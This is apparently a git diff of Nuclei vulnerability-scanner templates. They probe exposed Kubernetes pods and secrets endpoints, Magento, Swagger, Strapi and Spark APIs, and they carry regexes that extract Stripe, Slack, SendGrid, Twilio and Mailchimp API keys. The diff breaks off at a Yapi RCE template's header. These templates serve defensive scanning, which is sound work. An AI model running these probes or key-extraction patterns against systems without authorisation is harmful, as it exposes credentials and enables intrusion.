a/poc/api/kube-api-pods.yaml b/poc/api/kube-api-pods.yaml new file mode 100644 index 0000000000..c9cfbdb979 --- /dev/null +++ b/poc/api/kube-api-pods.yaml @@ -0,0 +1,26 @@ +id: kube-api-pods + +info: + name: Kube API Pods + author: sharath + severity: info + description: Scans for kube pods + tags: tech,k8s,kubernetes,devops,kube + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/default/pods" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"PodList":' + - '"items":' + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-secrets-8511.yaml b/poc/api/kube-api-secrets-8511.yaml index e946725992..9c9632570e 100644 --- a/poc/api/kube-api-secrets-8511.yaml +++ b/poc/api/kube-api-secrets-8511.yaml @@ -1,5 +1,4 @@ id: kube-api-secrets - info: name: Kube API Secrets author: sharath diff --git a/poc/api/kube-api-secrets-8512.yaml b/poc/api/kube-api-secrets-8512.yaml new file mode 100644 index 0000000000..e946725992 --- /dev/null +++ b/poc/api/kube-api-secrets-8512.yaml @@ -0,0 +1,26 @@ +id: kube-api-secrets + +info: + name: Kube API Secrets + author: sharath + severity: info + description: Scans for kube secrets endpoint + tags: tech,k8s,kubernetes,devops,kube + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/default/secrets" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"SecretList":' + - '"items":' + condition: and diff --git a/poc/api/kube-api-secrets.yaml b/poc/api/kube-api-secrets.yaml new file mode 100644 index 0000000000..cafadcbdf1 --- /dev/null +++ b/poc/api/kube-api-secrets.yaml @@ -0,0 +1,22 @@ +id: kube-api-secrets +info: + name: Kube API Secrets + author: sharath + severity: info + description: Scans for kube secrets endpoint + tags: tech,k8s,kubernetes,devops,kube +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/default/secrets" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"SecretList":' + - '"items":' + condition: and diff --git a/poc/api/kube-api-services-8513.yaml b/poc/api/kube-api-services-8513.yaml deleted file mode 100644 index 23f55153e4..0000000000 --- a/poc/api/kube-api-services-8513.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: kube-api-services -info: - name: Kube API Services - author: sharath - severity: info - description: Scans for kube services - tags: tech,k8s,kubernetes,devops,kube - -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/namespaces/default/services" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"ServiceList":' - - '"items":' - condition: and \ No newline at end of file diff --git a/poc/api/kube-api-services.yaml b/poc/api/kube-api-services.yaml deleted file mode 100644 index c037f8f678..0000000000 --- a/poc/api/kube-api-services.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: kube-api-services -info: - name: Kube API Services - author: sharath - severity: info - description: Scans for kube services - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/namespaces/default/services" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '"ServiceList":' - - '"items":' - condition: and diff --git a/poc/api/magento-2-exposed-api-8687.yaml b/poc/api/magento-2-exposed-api-8687.yaml index 7b79814f12..c5d33f7ec1 100644 --- a/poc/api/magento-2-exposed-api-8687.yaml +++ b/poc/api/magento-2-exposed-api-8687.yaml @@ -4,8 +4,7 @@ info: author: TechbrunchFR severity: info description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. - reference: - - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api tags: magento requests: - method: GET diff --git a/poc/api/magento-2-exposed-api-8689.yaml b/poc/api/magento-2-exposed-api-8689.yaml deleted file mode 100644 index 57e53632c6..0000000000 --- a/poc/api/magento-2-exposed-api-8689.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: magento-2-exposed-api - -info: - name: Exposed Magento 2 API - author: TechbrunchFR - severity: info - description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. - reference: - - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api - tags: magento - -requests: - - method: GET - path: - - '{{BaseURL}}/rest/V1/products' - - '{{BaseURL}}/rest/V1/store/storeConfigs' - - '{{BaseURL}}/rest/V1/store/storeViews' - - matchers-condition: or - matchers: - - type: dsl - dsl: - - 'contains(body, "searchCriteria")' - - 'contains(body, "parameters")' - - 'contains(body, "message")' - - 'contains(tolower(all_headers), "application/json")' - condition: and - - - type: dsl - dsl: - - 'contains(body, "secure_base_link_url")' - - 'contains(body, "timezone")' - - 'contains(tolower(all_headers), "application/json")' - - 'status_code == 200' - condition: and - - - type: dsl - dsl: - - 'contains(body, "name")' - - 'contains(body, "website_id")' - - 'contains(tolower(all_headers), "application/json")' - - 'status_code == 200' - condition: and \ No newline at end of file diff --git a/poc/api/mailchimp-api(1).yaml b/poc/api/mailchimp-api(1).yaml new file mode 100644 index 0000000000..7e5a4bad37 --- /dev/null +++ b/poc/api/mailchimp-api(1).yaml @@ -0,0 +1,16 @@ +id: mailchimp-api-key + +info: + name: Mailchimp API Key + author: gaurang + severity: high + tags: token,file,mailchimp + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "[0-9a-f]{32}-us[0-9]{1,2}" diff --git a/poc/api/mailchimp-api-11854.yaml b/poc/api/mailchimp-api-11854.yaml deleted file mode 100644 index 533e037281..0000000000 --- a/poc/api/mailchimp-api-11854.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: mailchimp-api-key -info: - name: Mailchimp API Key - author: gaurang - severity: high - tags: token,file,mailchimp -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" diff --git a/poc/api/mailchimp-api-key-8724.yaml b/poc/api/mailchimp-api-key-8724.yaml index 3ca9f1ae24..4c767939d2 100644 --- a/poc/api/mailchimp-api-key-8724.yaml +++ b/poc/api/mailchimp-api-key-8724.yaml @@ -1,16 +1,13 @@ id: mailchimp-access-key-value - info: name: Mailchimp API Value author: puzzlepeaches severity: info tags: exposure,token,mailchimp - requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body diff --git a/poc/api/mailchimp-api-key-8725.yaml b/poc/api/mailchimp-api-key-8725.yaml new file mode 100644 index 0000000000..3ca9f1ae24 --- /dev/null +++ b/poc/api/mailchimp-api-key-8725.yaml @@ -0,0 +1,18 @@ +id: mailchimp-access-key-value + +info: + name: Mailchimp API Value + author: puzzlepeaches + severity: info + tags: exposure,token,mailchimp + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "[0-9a-f]{32}-us[0-9]{1,2}" diff --git a/poc/api/mailgun-api-11855.yaml b/poc/api/mailgun-api-11855.yaml index ec96ecfed8..5b84ad10f0 100644 --- a/poc/api/mailgun-api-11855.yaml +++ b/poc/api/mailgun-api-11855.yaml @@ -1,15 +1,12 @@ id: mailgun-api-key - info: name: Mailgun API Key author: gaurang severity: high tags: token,file,mailgun - file: - extensions: - all - extractors: - type: regex regex: diff --git a/poc/api/mailgun-api.yaml b/poc/api/mailgun-api.yaml index 0c3db4d856..ec96ecfed8 100644 --- a/poc/api/mailgun-api.yaml +++ b/poc/api/mailgun-api.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file,mailgun + file: - extensions: - all @@ -13,5 +14,3 @@ file: - type: regex regex: - "key-[0-9a-zA-Z]{32}" - -# digest: 4a0a00473045022100d1400353de6af71a602908816db1e3f13148cd04a694f42af9b6b25a1099d8b402201aec613457a1a345d88d8c3151b6bc3256571fa527c5fc0819794ad3d5f5640d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/pictatic-api-key-9575.yaml b/poc/api/pictatic-api-key-9575.yaml deleted file mode 100644 index 946aed1ebf..0000000000 --- a/poc/api/pictatic-api-key-9575.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: pictatic-api-key -info: - name: Pictatic API Key - author: gaurang - severity: high - tags: token,file -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "sk_live_[0-9a-z]{32}" diff --git a/poc/api/pictatic-api-key-9576.yaml b/poc/api/pictatic-api-key-9576.yaml new file mode 100644 index 0000000000..ec20f07569 --- /dev/null +++ b/poc/api/pictatic-api-key-9576.yaml @@ -0,0 +1,16 @@ +id: pictatic-api-key + +info: + name: Pictatic API Key + author: gaurang + severity: high + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "sk_live_[0-9a-z]{32}" \ No newline at end of file diff --git a/poc/api/pictatic-api-key.yaml b/poc/api/pictatic-api-key.yaml index ec20f07569..41ea01a136 100644 --- a/poc/api/pictatic-api-key.yaml +++ b/poc/api/pictatic-api-key.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" \ No newline at end of file + - "sk_live_[0-9a-z]{32}" + +# digest: 4a0a00473045022100d571fd7454b599f0a3ae00922d80dfadb02ac853b00328f07a4f5bd41a63d879022001109992bb9b44fcacba43a0f3f72b19a6ad1b5f7d3e4c00d20e80cd1ec0e4d8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/sendgrid-api-key-10142.yaml b/poc/api/sendgrid-api-key-10142.yaml deleted file mode 100644 index 654cd5422d..0000000000 --- a/poc/api/sendgrid-api-key-10142.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: sendgrid-api-key - -info: - name: Sendgrid API Key Disclosure - author: Ice3man - severity: info - metadata: - max-request: 1 - tags: exposure,token,sendgrid - -http: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - part: body - regex: - - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}' - -# digest: 4a0a0047304502201531cc2f2d4fe7f2498c666b2ddd7aa51cc49680f9b952911a32ba3de39065220221008a225336c80a8445ec807c0e77474fd8a5802c4e1d63fa414e296287f74d2a45:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/sendgrid-api.yaml b/poc/api/sendgrid-api.yaml index 000c4516ea..f8d5d81271 100644 --- a/poc/api/sendgrid-api.yaml +++ b/poc/api/sendgrid-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,sendgrid - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" + +# digest: 4a0a00473045022100db3f9a4cb5ada6fcbe3bd6a463777cce68b4be7280b1525801bb93a81b89202602207901c7654fe5318ee02a07a99fee9560c2c840e9232933e9c4f49c5f7c7ea0a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/slack-api-11864.yaml b/poc/api/slack-api(1).yaml similarity index 100% rename from poc/api/slack-api-11864.yaml rename to poc/api/slack-api(1).yaml diff --git a/poc/api/slack-api.yaml b/poc/api/slack-api.yaml index 6f17ee55d5..51bef1c14c 100644 --- a/poc/api/slack-api.yaml +++ b/poc/api/slack-api.yaml @@ -1,5 +1,4 @@ id: slack-api - info: name: Slack API Key author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "xox[baprs]-([0-9a-zA-Z]{10,48})?" - -# digest: 4b0a00483046022100ba3776e008af0a4e7848a73adf72eb7a16913a260d81182aeac50bc9d167c3d3022100d24a73474fbec04e1368b575900583a20922f4cc0fc702c636f53651fc17f939:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/strapi-cms-detect-10538.yaml b/poc/api/strapi-cms-detect-10538.yaml index 5063a4b80b..530e120e7e 100644 --- a/poc/api/strapi-cms-detect-10538.yaml +++ b/poc/api/strapi-cms-detect-10538.yaml @@ -1,5 +1,4 @@ id: strapi-cms-detect - info: name: Strapi CMS detect author: cyllective,daffainfo,idealphase @@ -7,15 +6,11 @@ info: description: Open source Node.js Headless CMS to easily build customisable APIs reference: - https://github.com/strapi/strapi - metadata: - max-request: 1 tags: tech,strapi,cms - -http: +requests: - method: GET path: - "{{BaseURL}}/admin/init" - matchers-condition: and matchers: - type: word @@ -25,16 +20,12 @@ http: - '"uuid"' - '"hasAdmin"' condition: and - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - '"strapiVersion":"([0-9.]+)"' - -# digest: 490a00463044022063689c9b0ee20401cc8a1f9234eb881cc45e23929fcad30ffe91913cf8307c63022058b01f3090cb1afd3c54251e11698b7c0cc656b75372bcef9f5989cdea66f771:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/strapi-cms-detect-10539.yaml b/poc/api/strapi-cms-detect-10539.yaml index 5266dc58e2..52fa91b9ef 100644 --- a/poc/api/strapi-cms-detect-10539.yaml +++ b/poc/api/strapi-cms-detect-10539.yaml @@ -1,30 +1,19 @@ id: strapi-cms-detect info: - name: Strapi CMS detect - author: cyllective,daffainfo,idealphase + name: strapi CMS detect + author: cyllective severity: info - description: Open source Node.js Headless CMS to easily build customisable APIs - reference: https://github.com/strapi/strapi + description: Detects strapi CMS tags: tech,strapi,cms + reference: + - https://github.com/strapi/strapi requests: - method: GET path: - - "{{BaseURL}}/admin/init" - matchers-condition: and + - "{{BaseURL}}/admin/auth/login" matchers: - type: word part: body + condition: or words: - - '"data"' - - '"uuid"' - - '"hasAdmin"' - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '"strapiVersion":"([0-9.]+)"' + - 'Strapi Admin' diff --git a/poc/api/strapi-documentation-10543.yaml b/poc/api/strapi-documentation-10543.yaml index 6ce1d2e504..6a5b4281db 100644 --- a/poc/api/strapi-documentation-10543.yaml +++ b/poc/api/strapi-documentation-10543.yaml @@ -1,33 +1,28 @@ id: strapi-documentation - info: - name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public) + name: Strapi Documentation author: idealphase severity: info + description: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public) tags: strapi,panel - requests: - method: GET path: - '{{BaseURL}}/documentation' - '{{BaseURL}}/documentation/login' - stop-at-first-match: true matchers-condition: and matchers: - - type: word words: - "x-strapi-config" - "https://strapi.io/documentation/" condition: or - - type: word words: - "Swagger UI" - "Login - Documentation" condition: or - - type: status status: - 200 diff --git a/poc/api/strapi-documentation.yaml b/poc/api/strapi-documentation.yaml index 92a75d3c82..6ce1d2e504 100644 --- a/poc/api/strapi-documentation.yaml +++ b/poc/api/strapi-documentation.yaml @@ -1,28 +1,21 @@ id: strapi-documentation info: - name: Strapi CMS Documentation Login Panel - Detect + name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public) author: idealphase severity: info - description: Strapi CMS Documentation login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 2 tags: strapi,panel -http: +requests: - method: GET path: - '{{BaseURL}}/documentation' - '{{BaseURL}}/documentation/login' stop-at-first-match: true - matchers-condition: and matchers: + - type: word words: - "x-strapi-config" @@ -38,5 +31,3 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008b82ce5ef2d13e4c92a314c3e332b6a8e5e5abb480c999f79771d7f0ab121428022028ba4513fef9237f07fdb351a65b7b6366936ae11dd7bbfa2f49e2870f1c629a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/strapi-page-10544.yaml b/poc/api/strapi-page-10544.yaml deleted file mode 100644 index abec659651..0000000000 --- a/poc/api/strapi-page-10544.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: strapi-page -info: - name: Strapi Page - author: dhiyaneshDk - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 - tags: api,strapi -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: word - words: - - 'Welcome to your Strapi app' - condition: and diff --git a/poc/api/strapi-page-10545.yaml b/poc/api/strapi-page-10545.yaml index 30c6851020..abec659651 100644 --- a/poc/api/strapi-page-10545.yaml +++ b/poc/api/strapi-page-10545.yaml @@ -3,8 +3,7 @@ info: name: Strapi Page author: dhiyaneshDk severity: info - metadata: - shodan-query: http.title:"Welcome to your Strapi app" + reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 tags: api,strapi requests: - method: GET diff --git a/poc/api/strapi-page-10546.yaml b/poc/api/strapi-page-10546.yaml index 61d38c09b8..edf6a044e2 100644 --- a/poc/api/strapi-page-10546.yaml +++ b/poc/api/strapi-page-10546.yaml @@ -1,21 +1,14 @@ id: strapi-page info: - name: Strapi API - Detect + name: Strapi Page author: dhiyaneshDk severity: info - description: Strapi API was detected. - reference: https://strapi.io/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"Welcome to your Strapi app" - tags: api,strapi,exposure + reference: + - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 + tags: api,strapi -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -25,5 +18,3 @@ http: words: - 'Welcome to your Strapi app' condition: and - -# digest: 4b0a00483046022100859fc0e5aec1e65804427dbd12649e2f3adf4e4ce71b95604608cdf60d715803022100c73417dd6e7cb1446911af30545abecbee549cb091266bf972a9bd873b642236:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/stripe-api-key(1).yaml b/poc/api/stripe-api-key(1).yaml new file mode 100644 index 0000000000..d65411c71f --- /dev/null +++ b/poc/api/stripe-api-key(1).yaml @@ -0,0 +1,16 @@ +id: stripe-api-key + +info: + name: Stripe API Key + author: gaurang + severity: high + tags: token,file,stripe + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/poc/api/stripe-api-key-11869.yaml b/poc/api/stripe-api-key-11869.yaml deleted file mode 100644 index 5624af050d..0000000000 --- a/poc/api/stripe-api-key-11869.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: stripe-api-key -info: - name: Stripe API Key - author: gaurang - severity: high - tags: token,file,stripe -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/poc/api/stripe-api-key.yaml b/poc/api/stripe-api-key.yaml index d65411c71f..a5ea66caf7 100644 --- a/poc/api/stripe-api-key.yaml +++ b/poc/api/stripe-api-key.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,stripe - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" + +# digest: 4b0a00483046022100f0e284415d4e8014de7c3e8cfdf980c900fd56a840ea195cffecec856505187302210097d3c6810ed01c45e33ddcd46998419fda6972b412edda34ce8ff9ed4fa6384b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/swagger-api-10593.yaml b/poc/api/swagger-api-10593.yaml index 2662c02a5d..0266733f40 100644 --- a/poc/api/swagger-api-10593.yaml +++ b/poc/api/swagger-api-10593.yaml @@ -14,7 +14,6 @@ requests: - "{{BaseURL}}/api/swagger-ui.html" - "{{BaseURL}}/api-docs/swagger.json" - "{{BaseURL}}/api-docs/swagger.yaml" - - "{{BaseURL}}/api_docs" - "{{BaseURL}}/swagger.json" - "{{BaseURL}}/swagger.yaml" - "{{BaseURL}}/swagger/v1/swagger.json" @@ -49,7 +48,6 @@ requests: - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" - - "{{BaseURL}}/api/swagger_doc.json" stop-at-first-match: true matchers-condition: and matchers: diff --git a/poc/api/swagger-api-10595.yaml b/poc/api/swagger-api-10595.yaml new file mode 100644 index 0000000000..12d472625a --- /dev/null +++ b/poc/api/swagger-api-10595.yaml @@ -0,0 +1,81 @@ +id: swagger-api + +info: + name: Public Swagger API + author: pdteam,c-sh0 + severity: info + tags: exposure,api,swagger + +requests: + - method: GET + path: + - "{{BaseURL}}/swagger-ui/swagger-ui.js" + - "{{BaseURL}}/swagger/swagger-ui.js" + - "{{BaseURL}}/swagger-ui.js" + - "{{BaseURL}}/swagger/ui/swagger-ui.js" + - "{{BaseURL}}/swagger/ui/index" + - "{{BaseURL}}/swagger/index.html" + - "{{BaseURL}}/swagger-ui.html" + - "{{BaseURL}}/swagger/swagger-ui.html" + - "{{BaseURL}}/api/swagger-ui.html" + - "{{BaseURL}}/api-docs/swagger.json" + - "{{BaseURL}}/api-docs/swagger.yaml" + - "{{BaseURL}}/api_docs" + - "{{BaseURL}}/swagger.json" + - "{{BaseURL}}/swagger.yaml" + - "{{BaseURL}}/swagger/v1/swagger.json" + - "{{BaseURL}}/swagger/v1/swagger.yaml" + - "{{BaseURL}}/api/index.html" + - "{{BaseURL}}/api/docs/" + - "{{BaseURL}}/api/swagger.json" + - "{{BaseURL}}/api/swagger.yaml" + - "{{BaseURL}}/api/swagger.yml" + - "{{BaseURL}}/api/swagger/index.html" + - "{{BaseURL}}/api/swagger/swagger-ui.html" + - "{{BaseURL}}/api/api-docs/swagger.json" + - "{{BaseURL}}/api/api-docs/swagger.yaml" + - "{{BaseURL}}/api/swagger-ui/swagger.json" + - "{{BaseURL}}/api/swagger-ui/swagger.yaml" + - "{{BaseURL}}/api/apidocs/swagger.json" + - "{{BaseURL}}/api/apidocs/swagger.yaml" + - "{{BaseURL}}/api/swagger-ui/api-docs" + - "{{BaseURL}}/api/api-docs" + - "{{BaseURL}}/api/apidocs" + - "{{BaseURL}}/api/swagger" + - "{{BaseURL}}/api/swagger/static/index.html" + - "{{BaseURL}}/api/swagger-resources" + - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/__swagger__/" + - "{{BaseURL}}/api/_swagger_/" + - "{{BaseURL}}/api/spec/swagger.json" + - "{{BaseURL}}/api/spec/swagger.yaml" + - "{{BaseURL}}/api/swagger/ui/index" + - "{{BaseURL}}/__swagger__/" + - "{{BaseURL}}/_swagger_/" + - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" + - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" + - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/swagger_doc.json" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "swagger:" + - "Swagger 2.0" + - "\"swagger\":" + - "Swagger UI" + - "**token**:" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" diff --git a/poc/api/twilio-api-10860.yaml b/poc/api/twilio-api-10860.yaml new file mode 100644 index 0000000000..f1a98cc01b --- /dev/null +++ b/poc/api/twilio-api-10860.yaml @@ -0,0 +1,13 @@ +id: twilio-api +info: + name: Twilio API Key + author: gaurang + severity: high + tags: token,file +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" diff --git a/poc/api/twilio-api-10861.yaml b/poc/api/twilio-api-10861.yaml deleted file mode 100644 index 9895746a8a..0000000000 --- a/poc/api/twilio-api-10861.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: twilio-api - -info: - name: Twilio API Key - author: gaurang - severity: high - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file diff --git a/poc/api/twilio-api.yaml b/poc/api/twilio-api.yaml index f1a98cc01b..94674dffe2 100644 --- a/poc/api/twilio-api.yaml +++ b/poc/api/twilio-api.yaml @@ -1,4 +1,5 @@ id: twilio-api + info: name: Twilio API Key author: gaurang @@ -7,7 +8,10 @@ info: file: - extensions: - all + extractors: - type: regex regex: - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" + +# digest: 4b0a00483046022100de47f62e4aba3b07360714c3650501e642d180616b8fadb9c6af82114a17dcbe022100838e8bb6b140938d0a973f78addd50f15927ce43b471f402373a3a8676b4f889:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/unauth-spark-api-10961.yaml b/poc/api/unauth-spark-api-10961.yaml new file mode 100644 index 0000000000..5549591654 --- /dev/null +++ b/poc/api/unauth-spark-api-10961.yaml @@ -0,0 +1,31 @@ +id: unauth-spark-api +info: + name: Unauthenticated Spark REST API + author: princechaddha + severity: medium + description: The Spark product's REST API interface allows access to unauthenticated users. + remediation: Restrict access the exposed API ports. + reference: https://xz.aliyun.com/t/2490 + tags: spark,unauth + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + +requests: + - method: GET + path: + - "{{BaseURL}}/v1/submissions" + matchers-condition: and + matchers: + - type: status + status: + - 400 + - type: word + words: + - "Missing an action" + - "serverSparkVersion" + part: body + condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/poc/api/unauth-spark-api.yaml b/poc/api/unauth-spark-api.yaml new file mode 100644 index 0000000000..2025d7145b --- /dev/null +++ b/poc/api/unauth-spark-api.yaml @@ -0,0 +1,30 @@ +id: unauth-spark-api +info: + name: Unauthenticated Spark REST API + author: princechaddha + severity: medium + description: The Spark product's REST API interface allows access to unauthenticated users. + remediation: Restrict access the exposed API ports. + reference: https://xz.aliyun.com/t/2490 + tags: spark,unauth + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 +requests: + - method: GET + path: + - "{{BaseURL}}/v1/submissions" + matchers-condition: and + matchers: + - type: status + status: + - 400 + - type: word + words: + - "Missing an action" + - "serverSparkVersion" + part: body + condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/poc/api/wadl-api.yaml b/poc/api/wadl-api-11083.yaml similarity index 100% rename from poc/api/wadl-api.yaml rename to poc/api/wadl-api-11083.yaml diff --git a/poc/api/wadl-api-11085.yaml b/poc/api/wadl-api-11085.yaml index 9f1cbe09ec..84a5ac47dd 100644 --- a/poc/api/wadl-api-11085.yaml +++ b/poc/api/wadl-api-11085.yaml @@ -1,15 +1,22 @@ id: wadl-api info: - name: wadl file disclosure + name: WADL API - Detect author: 0xrudra,manuelbua severity: info - tags: exposure,api + description: WADL API was detected. reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 8 + tags: exposure,api -requests: +http: - method: GET path: - "{{BaseURL}}/application.wadl" @@ -41,3 +48,5 @@ requests: - "This is simplified WADL with user and core resources only" - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" + +# digest: 4b0a00483046022100e2f839e3c09ac43f2fef563e3df53c2508374f88b7a6440f5b8e77a7dbefcc05022100a0f7c47efacbf012afecb48f03f8c1f63a337bf8b96061929d5a1de831f61d79:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/wsdl-api-11632.yaml b/poc/api/wsdl-api-11632.yaml index 8636c2d554..71703837f3 100644 --- a/poc/api/wsdl-api-11632.yaml +++ b/poc/api/wsdl-api-11632.yaml @@ -3,8 +3,8 @@ info: name: wsdl-detect author: jarijaas severity: info - tags: exposure,api description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) + tags: exposure,api requests: - method: GET path: diff --git a/poc/api/wsdl-api.yaml b/poc/api/wsdl-api.yaml deleted file mode 100644 index 71703837f3..0000000000 --- a/poc/api/wsdl-api.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: wsdl-api -info: - name: wsdl-detect - author: jarijaas - severity: info - description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) - tags: exposure,api -requests: - - method: GET - path: - - "{{BaseURL}}/?wsdl" - matchers: - - type: word - words: - - "wsdl:definitions" diff --git a/poc/api/wso2-apimanager-detect-11638.yaml b/poc/api/wso2-apimanager-detect-11638.yaml deleted file mode 100644 index 042ae34b83..0000000000 --- a/poc/api/wso2-apimanager-detect-11638.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wso2-apimanager-detect -info: - name: WSO2 API Manager detect - author: righettod - severity: info - description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint - tags: tech,wso2,api-manager -requests: - - method: GET - path: - - "{{BaseURL}}/services/Version" - matchers-condition: and - matchers: - - type: word - words: - - "version.services.core.carbon.wso2.org" - - type: status - status: - - 200 diff --git a/poc/api/yapi-rce-11724.yaml b/poc/api/yapi-rce-11724.yaml index 0afebedde5..62f4be0f79 100644 --- a/poc/api/yapi-rce-11724.yaml +++ b/poc/api/yapi-rce-11724.yaml @@ -1,55 +1,68 @@ id: yapi-rce info: - name: Yapi - Remote Code Execution + name: Yapi Remote Code Execution author: pikpikcu severity: critical - description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. - reference: + tags: yapi,rce + reference: | - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - 